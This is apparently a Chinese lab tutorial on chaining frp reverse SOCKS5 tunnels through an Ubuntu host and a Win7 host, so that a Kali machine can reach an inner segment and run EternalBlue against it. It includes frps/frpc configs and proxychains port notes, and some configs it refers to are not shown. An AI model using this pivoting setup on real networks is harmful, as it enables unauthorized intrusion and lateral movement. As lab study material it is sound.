攻击机:kali (192.168.111.130)
第一层:ubuntu(192.168.111.129)(192.168.183.128)
第二层:win7 (192.168.40.129) (192.168.183.129)
第三层:win2008 (192.168.40.128)
搭第一层隧道:
①先在攻击机上配置并开好代理:
frps.ini配置:
[common]
bind_port = 7000
启动代理
./frps -c frps.ini
看到success即为成功
②上传frpc和frpc.ini到ubuntu上,frpc.ini配置如下
server_addr = 192.168.111.130 #攻击机IP
server_port = 7000
[socks_proxy]
type=tcp
remote_port = 6000
plugin = socks5
注意:搭好之后,攻击机的7000和6000端口都会开放,具体怎么使用代理参考上一篇文章
③目标启动代理
./frpc -c frpc.ini
到这里,第一层代理已经搭好,开始搭第二层:
①上传frps和frps.ini到ubuntu,也就是第一层的目标主机上,配置好并启动,参考配置如下:
端口随意设置
②ubuntu服务端启动好后,要来到win7,将frpc和frpc.ini上传后配置并启动,参考配置如下:
可以看出来,相比第一层,只是改了端口和ip。
至此,我们攻击机就可以通过proxychains直达192.168.40.0/24网段
proxychains具体配置如下:
6000端口对应第一层,9000则对应第二层。
用永恒之蓝尝试攻击192.168.40.0/24网段主机,可以成功
如果攻击机为windows的可以用proxifier做全局代理,具体方法看这位师傅的文章
frp多层内网隧道搭建 proxychains及proxyfier多层代理详细设置_proxifier多级代理-优快云博客